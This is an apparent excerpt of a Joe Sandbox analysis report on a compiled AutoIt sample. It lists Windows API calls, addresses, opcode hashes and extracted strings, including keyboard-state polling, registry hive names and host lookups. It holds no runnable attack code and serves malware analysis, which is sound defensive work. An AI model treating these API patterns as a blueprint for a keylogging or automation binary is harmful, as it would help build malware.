                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: LoadString__swprintf_wprintf$_memmove
                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                • API String ID: 311963372-2391861430
                                • Opcode ID: 35596ed9b7cfa504bd2721b89ade90bd07cbd9dea83dfc0dd8c6ba38582af3fb
                                • Instruction ID: bbda522631f1472cc1f28a0542ccdbe8e30783bdccb3b69d910b4bfc52491afc
                                • Opcode Fuzzy Hash: 35596ed9b7cfa504bd2721b89ade90bd07cbd9dea83dfc0dd8c6ba38582af3fb
                                • Instruction Fuzzy Hash: FB515B72900209AACF15EBE0CE86EEEBBB9AF05300F1045A5F505730E1EB316F59DB61
                                APIs
                                  • Part of subcall function 00AC0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00AA6C6C,?,00008000), ref: 00AC0BB7
                                  • Part of subcall function 00AA48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA48A1,?,?,00AA37C0,?), ref: 00AA48CE
                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AA6D0D
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AA6E5A
                                  • Part of subcall function 00AA59CD: _wcscpy.LIBCMT ref: 00AA5A05
                                  • Part of subcall function 00AC387D: _iswctype.LIBCMT ref: 00AC3885
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                • API String ID: 537147316-1018226102
                                • Opcode ID: 74b320852f0280a23cc00c499786305ec6a4fc161b9163487ab335e21b319024
                                • Instruction ID: 32001b8472818412b8c185ba88736aeb8ae16fb3ca0904c6216a8a528b1859e0
                                • Opcode Fuzzy Hash: 74b320852f0280a23cc00c499786305ec6a4fc161b9163487ab335e21b319024
                                • Instruction Fuzzy Hash: 9D028D315083419FC724EF24C991AAFBBF5BF9A354F04492EF48A972A1DB30D949CB52
                                APIs
                                • _memset.LIBCMT ref: 00AA45F9
                                • GetMenuItemCount.USER32(00B66890), ref: 00ADD7CD
                                • GetMenuItemCount.USER32(00B66890), ref: 00ADD87D
                                • GetCursorPos.USER32(?), ref: 00ADD8C1
                                • SetForegroundWindow.USER32(00000000), ref: 00ADD8CA
                                • TrackPopupMenuEx.USER32(00B66890,00000000,?,00000000,00000000,00000000), ref: 00ADD8DD
                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00ADD8E9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                • String ID:
                                • API String ID: 2751501086-0
                                • Opcode ID: b2d36935cc7f8f7a3dd401a8ac97bceead891a4ea00cbae7a46e1bd4d90b2eef
                                • Instruction ID: 7177f33c41ab17496e128bb180428f94879774193dd322a7dcf409395c6903c1
                                • Opcode Fuzzy Hash: b2d36935cc7f8f7a3dd401a8ac97bceead891a4ea00cbae7a46e1bd4d90b2eef
                                • Instruction Fuzzy Hash: E271C470640206BEEB319F64DC89FAABF74FF45764F204266F515A72E1CBB1A810DB90
                                APIs
                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B20038,?,?), ref: 00B210BC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: BuffCharUpper
                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                • API String ID: 3964851224-909552448
                                • Opcode ID: cc0856e0e18e26a0e2b8ee7cb87968f6ce736392a53832da0e9d39ac818e4c97
                                • Instruction ID: a90a2d03090517ae8067f43569eb017dd4816a1cb6f880a658d5deb1b76b5a2b
                                • Opcode Fuzzy Hash: cc0856e0e18e26a0e2b8ee7cb87968f6ce736392a53832da0e9d39ac818e4c97
                                • Instruction Fuzzy Hash: 32412B3115025ACBCF51EE94E991EEA37A4EF25341F504898FC966B292DB30AE1ACB50
                                APIs
                                  • Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66
                                  • Part of subcall function 00AA7A84: _memmove.LIBCMT ref: 00AA7B0D
                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B055D2
                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B055E8
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B055F9
                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B0560B
                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B0561C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: SendString$_memmove
                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                • API String ID: 2279737902-1007645807
                                • Opcode ID: 893deb97203d9d27a7105a9fa3f082e7229a47a34a5ed9242de1d47012843c99
                                • Instruction ID: ec03e669eac7c8aa92421917ead943b3a5f55aad44058af0c2260d71b9c62179
                                • Opcode Fuzzy Hash: 893deb97203d9d27a7105a9fa3f082e7229a47a34a5ed9242de1d47012843c99
                                • Instruction Fuzzy Hash: F311863159015979D730A661CC49EFF7FBCEF96B44F4405E9B801A30E1DF611D09C9A5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                • String ID: 0.0.0.0
                                • API String ID: 208665112-3771769585
                                • Opcode ID: d11f1f1f1eb3989d45572e3f39486ed4ae6d28806d5b492f9f7772016d581753
                                • Instruction ID: fca65e3c0f23d710ab239b6fdc62199f8eeda30d4efe62a023c1695f8669d3d3
                                • Opcode Fuzzy Hash: d11f1f1f1eb3989d45572e3f39486ed4ae6d28806d5b492f9f7772016d581753
                                • Instruction Fuzzy Hash: 8A11D571904119AFCB20AB249D4AFEB7BFCDB41750F0501F9F504960A1EF709E829791
                                APIs
                                • timeGetTime.WINMM ref: 00B0521C
                                  • Part of subcall function 00AC0719: timeGetTime.WINMM(?,75C0B400,00AB0FF9), ref: 00AC071D
                                • Sleep.KERNEL32(0000000A), ref: 00B05248
                                • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00B0526C
                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B0528E
                                • SetActiveWindow.USER32 ref: 00B052AD
                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B052BB
                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B052DA
                                • Sleep.KERNEL32(000000FA), ref: 00B052E5
                                • IsWindow.USER32 ref: 00B052F1
                                • EndDialog.USER32(00000000), ref: 00B05302
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                • String ID: BUTTON
                                • API String ID: 1194449130-3405671355
                                • Opcode ID: f3ad77696035a19767e61acf06ba5fdc33d47c3027e8191c9d3725338db9d313
                                • Instruction ID: 290722e3e58d88716f0a3047c68eff1c417d848eea4d664ccdd345892474859b
                                • Opcode Fuzzy Hash: f3ad77696035a19767e61acf06ba5fdc33d47c3027e8191c9d3725338db9d313
                                • Instruction Fuzzy Hash: 9C218E70244706AFE7215B20ED99E363FA9EB6478AF0014B8F502935F1DFA99C058E21
                                APIs
                                  • Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
                                  • Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C
                                • CoInitialize.OLE32(00000000), ref: 00B0D855
                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B0D8E8
                                • SHGetDesktopFolder.SHELL32(?), ref: 00B0D8FC
                                • CoCreateInstance.OLE32(00B32D7C,00000000,00000001,00B5A89C,?), ref: 00B0D948
                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B0D9B7
                                • CoTaskMemFree.OLE32(?,?), ref: 00B0DA0F
                                • _memset.LIBCMT ref: 00B0DA4C
                                • SHBrowseForFolderW.SHELL32(?), ref: 00B0DA88
                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B0DAAB
                                • CoTaskMemFree.OLE32(00000000), ref: 00B0DAB2
                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B0DAE9
                                • CoUninitialize.OLE32(00000001,00000000), ref: 00B0DAEB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                • String ID:
                                • API String ID: 1246142700-0
                                • Opcode ID: f06b86973d76718f809beabd4b5b1235917daa85c65d801196ac9652cdde2f56
                                • Instruction ID: 42bafa5e231d32d94c80167a4b87d7e7a19d74ee922b07eec11c549ce7d796c6
                                • Opcode Fuzzy Hash: f06b86973d76718f809beabd4b5b1235917daa85c65d801196ac9652cdde2f56
                                • Instruction Fuzzy Hash: 3DB1FD75A00209AFDB14DFA4C984DAEBBF9FF49314B1484A9F505EB2A1DB30ED45CB50
                                APIs
                                • GetKeyboardState.USER32(?), ref: 00B005A7
                                • SetKeyboardState.USER32(?), ref: 00B00612
                                • GetAsyncKeyState.USER32(000000A0), ref: 00B00632
                                • GetKeyState.USER32(000000A0), ref: 00B00649
                                • GetAsyncKeyState.USER32(000000A1), ref: 00B00678
                                • GetKeyState.USER32(000000A1), ref: 00B00689
                                • GetAsyncKeyState.USER32(00000011), ref: 00B006B5
                                • GetKeyState.USER32(00000011), ref: 00B006C3
                                • GetAsyncKeyState.USER32(00000012), ref: 00B006EC
                                • GetKeyState.USER32(00000012), ref: 00B006FA
                                • GetAsyncKeyState.USER32(0000005B), ref: 00B00723
                                • GetKeyState.USER32(0000005B), ref: 00B00731
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: State$Async$Keyboard
                                • String ID:
                                • API String ID: 541375521-0
                                • Opcode ID: e81e476bc266266e2d3330e5f8ec917a42096efa7a9efba22f1665900051ee5b
                                • Instruction ID: b00aede558b297edc1fe34f1cabbf13b79ab627ff0201e3648e61bd15f8d29e3
                                • Opcode Fuzzy Hash: e81e476bc266266e2d3330e5f8ec917a42096efa7a9efba22f1665900051ee5b
                                • Instruction Fuzzy Hash: 6851D930A1478829FB35FBA488557EABFF5DF11380F0885D9D5C2571C2DA649B4CCB61
                                APIs
                                • GetDlgItem.USER32(?,00000001), ref: 00AFC746
                                • GetWindowRect.USER32(00000000,?), ref: 00AFC758
                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00AFC7B6
                                • GetDlgItem.USER32(?,00000002), ref: 00AFC7C1
                                • GetWindowRect.USER32(00000000,?), ref: 00AFC7D3
                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00AFC827
                                • GetDlgItem.USER32(?,000003E9), ref: 00AFC835
                                • GetWindowRect.USER32(00000000,?), ref: 00AFC846
                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00AFC889
                                • GetDlgItem.USER32(?,000003EA), ref: 00AFC897
                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00AFC8B4
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00AFC8C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$ItemMoveRect$Invalidate
                                • String ID:
                                • API String ID: 3096461208-0
                                • Opcode ID: ad23c421565daadf9083f650000f9b47c583c5bcb18089496faf92c270356760
                                • Instruction ID: d64e0ea174f4f20200df59c0d2eb042b5564644b88ab64452956fbf40cdf81a3
                                • Opcode Fuzzy Hash: ad23c421565daadf9083f650000f9b47c583c5bcb18089496faf92c270356760
                                • Instruction Fuzzy Hash: 64512071B00209ABDB18CFA9DD99ABEBBB6EB88711F14813DF615D7290DB709D01CB50
                                APIs
                                  • Part of subcall function 00AA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AA2036,?,00000000,?,?,?,?,00AA16CB,00000000,?), ref: 00AA1B9A
                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00AA20D3
                                • KillTimer.USER32(-00000001,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00AA216E
                                • DestroyAcceleratorTable.USER32(00000000), ref: 00ADBEF6
                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00ADBF27
                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00ADBF3E
                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00ADBF5A
                                • DeleteObject.GDI32(00000000), ref: 00ADBF6C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                • String ID:
                                • API String ID: 641708696-0
                                • Opcode ID: f2f726cfa30399771d02156fd7eb042de117e0bfc3a483c2f8cb3eccfd78ffec
                                • Instruction ID: 7e05c1d50fa0b5cda0f6f688c2c629f740218583cea6ddd1ad92ede94abc07b6
                                • Opcode Fuzzy Hash: f2f726cfa30399771d02156fd7eb042de117e0bfc3a483c2f8cb3eccfd78ffec
                                • Instruction Fuzzy Hash: 43618B31501611DFCB359F28DD48B2AB7F1FB45316F10852AE54287AE0CB79ACA1DF91
                                APIs
                                  • Part of subcall function 00AA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AA25EC
                                • GetSysColor.USER32(0000000F), ref: 00AA21D3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ColorLongWindow
                                • String ID:
                                • API String ID: 259745315-0
                                • Opcode ID: 8329e25dc964546f955d3ecb15f1ca597003f7b1329549df1ac49ecf6c475905
                                • Instruction ID: 192401363d9602fb139a38087a072c96e90e02e57d98504b7be079dc7846ebd3
                                • Opcode Fuzzy Hash: 8329e25dc964546f955d3ecb15f1ca597003f7b1329549df1ac49ecf6c475905
                                • Instruction Fuzzy Hash: 48419F311001519ADB215F2CDC88BB93B76EB07331F584366FD669B2E6CB318C66DB61
                                APIs
                                • CharLowerBuffW.USER32(?,?,00B2F910), ref: 00B0AB76
                                • GetDriveTypeW.KERNEL32(00000061,00B5A620,00000061), ref: 00B0AC40
                                • _wcscpy.LIBCMT ref: 00B0AC6A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: BuffCharDriveLowerType_wcscpy
                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                • API String ID: 2820617543-1000479233
                                • Opcode ID: 56d20513b917b9b9e2011157c38204d93086408b1121b6a61833d1bc5c68ec67
                                • Instruction ID: ab6e363b149887e99be901ffae963c22248e154123271fd1a16bedd0513bb115
                                • Opcode Fuzzy Hash: 56d20513b917b9b9e2011157c38204d93086408b1121b6a61833d1bc5c68ec67
                                • Instruction Fuzzy Hash: D15177311083019BC720EF14C991EAABBE5EF95341F1449ADF896572E2EB31DA4ACA53
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: __i64tow__itow__swprintf
                                • String ID: %.15g$0x%p$False$True
                                • API String ID: 421087845-2263619337
                                • Opcode ID: df9f7637fa57eead0a1cfa625bf2d2e9a07154732ffabac15946408b805379dc
                                • Instruction ID: b27b82e2a9cbcfe256789aa23050d51fa496982bb5ccd649ccbcfc9b73494157
                                • Opcode Fuzzy Hash: df9f7637fa57eead0a1cfa625bf2d2e9a07154732ffabac15946408b805379dc
                                • Instruction Fuzzy Hash: 7B41AF71A04205AEDB24AB78DD42F7BB7F8EB45300F2044AFE54AD72A5EB7199428B11
                                APIs
                                • _memset.LIBCMT ref: 00B273D9
                                • CreateMenu.USER32 ref: 00B273F4
                                • SetMenu.USER32(?,00000000), ref: 00B27403
